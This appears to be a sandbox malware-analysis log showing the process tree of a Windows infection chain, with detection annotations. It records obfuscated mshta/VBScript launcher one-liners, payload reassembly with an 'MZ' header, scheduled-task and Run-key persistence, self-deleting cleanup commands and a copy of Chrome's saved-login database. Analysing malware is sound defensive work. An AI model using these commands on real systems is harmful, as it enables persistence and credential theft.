C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635085627 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵PID:9200
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe & exit10⤵
- Blocklisted process makes network request
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exeC:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe11⤵PID:5796
-
C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe"C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe" -u12⤵PID:7684
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mh0ttsgr.5dn\gcleaner.exe /mixfive & exit10⤵PID:7388
-
C:\Users\Admin\AppData\Local\Temp\mh0ttsgr.5dn\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\mh0ttsgr.5dn\gcleaner.exe /mixfive11⤵PID:6468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtuo0mdo.yro\autosubplayer.exe /S & exit10⤵PID:7280
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\x9ASqAjzf_Bbkm30Jcu897HP.exe"C:\Users\Admin\Pictures\Adobe Films\x9ASqAjzf_Bbkm30Jcu897HP.exe"6⤵
- Loads dropped DLL
PID:1184 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵PID:8972
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"8⤵
- Checks whether UAC is enabled
PID:7508 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x250,0x254,0x258,0x1b0,0x25c,0x7ffd8f5ddec0,0x7ffd8f5dded0,0x7ffd8f5ddee09⤵PID:8776
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff785dc9e70,0x7ff785dc9e80,0x7ff785dc9e9010⤵PID:9356
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1732,13450803032759380374,11374153478421282962,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7508_508508207" --mojo-platform-channel-handle=1748 /prefetch:89⤵PID:7848
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe4⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2492 -
C:\Users\Admin\AppData\Roaming\485024.exe"C:\Users\Admin\AppData\Roaming\485024.exe"6⤵
- Executes dropped EXE
PID:2364
-
-
C:\Users\Admin\AppData\Roaming\5661510.exe"C:\Users\Admin\AppData\Roaming\5661510.exe"6⤵
- Executes dropped EXE
PID:4396
-
-
C:\Users\Admin\AppData\Roaming\838218.exe"C:\Users\Admin\AppData\Roaming\838218.exe"6⤵
- Executes dropped EXE
PID:4864
-
-
C:\Users\Admin\AppData\Roaming\4220952.exe"C:\Users\Admin\AppData\Roaming\4220952.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4360 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:5136
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe4⤵PID:2260
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exeWed094c47c32b.exe5⤵
- Executes dropped EXE
PID:1764 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))6⤵
- Checks whether UAC is enabled
PID:3820 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"7⤵PID:4764
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4352 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))9⤵PID:4644
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"10⤵PID:5232
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))9⤵
- Checks whether UAC is enabled
PID:5540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t10⤵
- Checks whether UAC is enabled
PID:4644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "11⤵PID:5812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"11⤵PID:5176
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU11⤵PID:6568
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"8⤵
- Kills process with taskkill
PID:5144
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe4⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09977fdc12334.exeWed09977fdc12334.exe5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2012 -
C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"6⤵
- Executes dropped EXE
PID:6932
-
-
C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"6⤵
- Executes dropped EXE
PID:4932
-
-
C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3120
-
-
C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"6⤵
- Executes dropped EXE
PID:3880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "c159B_KHXHENlHi35uxznXRu.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe" & exit7⤵
- Blocklisted process makes network request
PID:2104 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "c159B_KHXHENlHi35uxznXRu.exe" /f8⤵
- Kills process with taskkill
PID:6388
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6608
-
-
C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6364 -
C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"7⤵
- Checks computer location settings
PID:2524 -
C:\Users\Admin\Pictures\Adobe Films\3EfoYFOdZT3aZlcwnqbXQBvX.exe"C:\Users\Admin\Pictures\Adobe Films\3EfoYFOdZT3aZlcwnqbXQBvX.exe"8⤵PID:6344
-
-
C:\Users\Admin\Pictures\Adobe Films\xuy1lnmo31svAO6TQH0HiDA2.exe"C:\Users\Admin\Pictures\Adobe Films\xuy1lnmo31svAO6TQH0HiDA2.exe"8⤵PID:4568
-
-
C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"8⤵
- Checks whether UAC is enabled
PID:7404 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
- Checks whether UAC is enabled
PID:8064 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:8936
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "PevlGZ3PxwUKzaOKeJMTqLD6.exe"11⤵
- Kills process with taskkill
PID:4016
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5TwQldBBKddT0Pf6ywV7lM59.exe"C:\Users\Admin\Pictures\Adobe Films\5TwQldBBKddT0Pf6ywV7lM59.exe"8⤵PID:7388
-
-
C:\Users\Admin\Pictures\Adobe Films\vyW85Es_K5BafN6AHs0gsV64.exe"C:\Users\Admin\Pictures\Adobe Films\vyW85Es_K5BafN6AHs0gsV64.exe"8⤵PID:7380
-
-
C:\Users\Admin\Pictures\Adobe Films\SG5COJhctDghfNe0iIIPrpP1.exe"C:\Users\Admin\Pictures\Adobe Films\SG5COJhctDghfNe0iIIPrpP1.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8120
-
-
C:\Users\Admin\Pictures\Adobe Films\1rH8LW1EItSD43swbUKqQGai.exe"C:\Users\Admin\Pictures\Adobe Films\1rH8LW1EItSD43swbUKqQGai.exe"8⤵PID:5940
-
-
C:\Users\Admin\Pictures\Adobe Films\uX3Qqm8F5HavxjTh58PMEXEs.exe"C:\Users\Admin\Pictures\Adobe Films\uX3Qqm8F5HavxjTh58PMEXEs.exe"8⤵PID:7788
-
C:\Users\Admin\AppData\Local\Temp\is-GV18I.tmp\uX3Qqm8F5HavxjTh58PMEXEs.tmp"C:\Users\Admin\AppData\Local\Temp\is-GV18I.tmp\uX3Qqm8F5HavxjTh58PMEXEs.tmp" /SL5="$5048C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\uX3Qqm8F5HavxjTh58PMEXEs.exe"9⤵
- Checks whether UAC is enabled
PID:4032 -
C:\Users\Admin\AppData\Local\Temp\is-1N653.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-1N653.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:8768 -
C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe"C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe" /VERYSILENT11⤵
- Checks whether UAC is enabled
PID:7964
-
-
C:\Users\Admin\AppData\Local\Temp\4f-aa555-e46-a8aa5-03139b437fd09\Taegeguxobu.exe"C:\Users\Admin\AppData\Local\Temp\4f-aa555-e46-a8aa5-03139b437fd09\Taegeguxobu.exe"11⤵
- Checks computer location settings
PID:7432
-
-
C:\Users\Admin\AppData\Local\Temp\c7-a3685-951-06084-c1b11b3929c8e\Wadykerulu.exe"C:\Users\Admin\AppData\Local\Temp\c7-a3685-951-06084-c1b11b3929c8e\Wadykerulu.exe"11⤵
- Checks whether UAC is enabled
PID:4520 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sfs2eall.xor\GcleanerEU.exe /eufive & exit12⤵PID:8652
-
C:\Users\Admin\AppData\Local\Temp\sfs2eall.xor\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\sfs2eall.xor\GcleanerEU.exe /eufive13⤵PID:9916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wlsqpbcp.bsq\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\wlsqpbcp.bsq\installer.exeC:\Users\Admin\AppData\Local\Temp\wlsqpbcp.bsq\installer.exe /qn CAMPAIGN="654"13⤵
- Checks whether UAC is enabled
PID:10016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe & exit12⤵PID:9288
-
C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exeC:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe13⤵PID:10140
-
C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe"C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe" -u14⤵PID:7012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵PID:6232
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksk5lj04.13h\gcleaner.exe /mixfive & exit12⤵PID:9480
-
C:\Users\Admin\AppData\Local\Temp\ksk5lj04.13h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ksk5lj04.13h\gcleaner.exe /mixfive13⤵PID:10236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oovml3wk.oru\autosubplayer.exe /S & exit12⤵PID:9612
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe"C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe"8⤵PID:7772
-
C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe"C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe" -u9⤵PID:7940
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:3484
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe" & del C:\ProgramData\*.dll & exit7⤵PID:4780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f8⤵
- Kills process with taskkill
PID:2164
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:4960
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe4⤵PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe4⤵PID:3096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe4⤵PID:2176
-
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:6320 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"3⤵PID:5584
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵PID:9208
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:5152
-
-
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵PID:6400
-
-
C:\Windows\SysWOW64\chkdsk.exe"C:\Windows\SysWOW64\chkdsk.exe"2⤵
- Enumerates system info in registry
PID:4976
-
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"2⤵PID:5268
-
-
C:\Users\Admin\AppData\Local\Temp\A8A6.exeC:\Users\Admin\AppData\Local\Temp\A8A6.exe2⤵
- Suspicious use of SetThreadContext
PID:6172 -
C:\Users\Admin\AppData\Local\Temp\A8A6.exeC:\Users\Admin\AppData\Local\Temp\A8A6.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5000
-
-
-
C:\Users\Admin\AppData\Local\Temp\C1DC.exeC:\Users\Admin\AppData\Local\Temp\C1DC.exe2⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\C71D.exeC:\Users\Admin\AppData\Local\Temp\C71D.exe2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5912
-
-
C:\Users\Admin\AppData\Local\Temp\D305.exeC:\Users\Admin\AppData\Local\Temp\D305.exe2⤵
- Loads dropped DLL
- Checks processor information in registry
PID:5008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im D305.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D305.exe" & del C:\ProgramData\*.dll & exit3⤵PID:8412
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im D305.exe /f4⤵
- Kills process with taskkill
PID:8992
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:1628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DD37.exeC:\Users\Admin\AppData\Local\Temp\DD37.exe2⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"3⤵PID:6376
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F4⤵
- Creates scheduled task(s)
PID:6156
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵PID:7084
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\5⤵
- Executes dropped EXE
PID:4972
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2618.exeC:\Users\Admin\AppData\Local\Temp\2618.exe2⤵PID:7724
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:4408
-
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\3EC2.dll2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\4386.exeC:\Users\Admin\AppData\Local\Temp\4386.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\743B.exeC:\Users\Admin\AppData\Local\Temp\743B.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9060
-
-
C:\Users\Admin\AppData\Local\Temp\B0DE.exeC:\Users\Admin\AppData\Local\Temp\B0DE.exe2⤵
- Suspicious use of SetThreadContext
PID:9624 -
C:\Users\Admin\AppData\Local\Temp\B0DE.exeC:\Users\Admin\AppData\Local\Temp\B0DE.exe3⤵
- Adds Run key to start application
PID:5040 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\a10ad8b7-4b73-4fc7-be07-0e91604e81ac" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:4980
-
-
C:\Users\Admin\AppData\Local\Temp\B0DE.exe"C:\Users\Admin\AppData\Local\Temp\B0DE.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
PID:9128 -
C:\Users\Admin\AppData\Local\Temp\B0DE.exe"C:\Users\Admin\AppData\Local\Temp\B0DE.exe" --Admin IsNotAutoStart IsNotTask5⤵PID:4420
-
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"6⤵
- Suspicious use of SetThreadContext
PID:4376 -
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"7⤵
- Checks processor information in registry
PID:2116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe" & del C:\ProgramData\*.dll & exit8⤵PID:9920
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
PID:9628
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:4624
-
-
-
-
-
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"6⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:8972 -
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"7⤵PID:9108
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
PID:8244
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B92C.exeC:\Users\Admin\AppData\Local\Temp\B92C.exe2⤵
- Checks processor information in registry
PID:996 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im B92C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B92C.exe" & del C:\ProgramData\*.dll & exit3⤵PID:10160
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im B92C.exe /f4⤵
- Kills process with taskkill
PID:9312
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:4432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BCF6.exeC:\Users\Admin\AppData\Local\Temp\BCF6.exe2⤵PID:7820
-
-
C:\Users\Admin\AppData\Local\Temp\C3AE.exeC:\Users\Admin\AppData\Local\Temp\C3AE.exe2⤵PID:7116
-
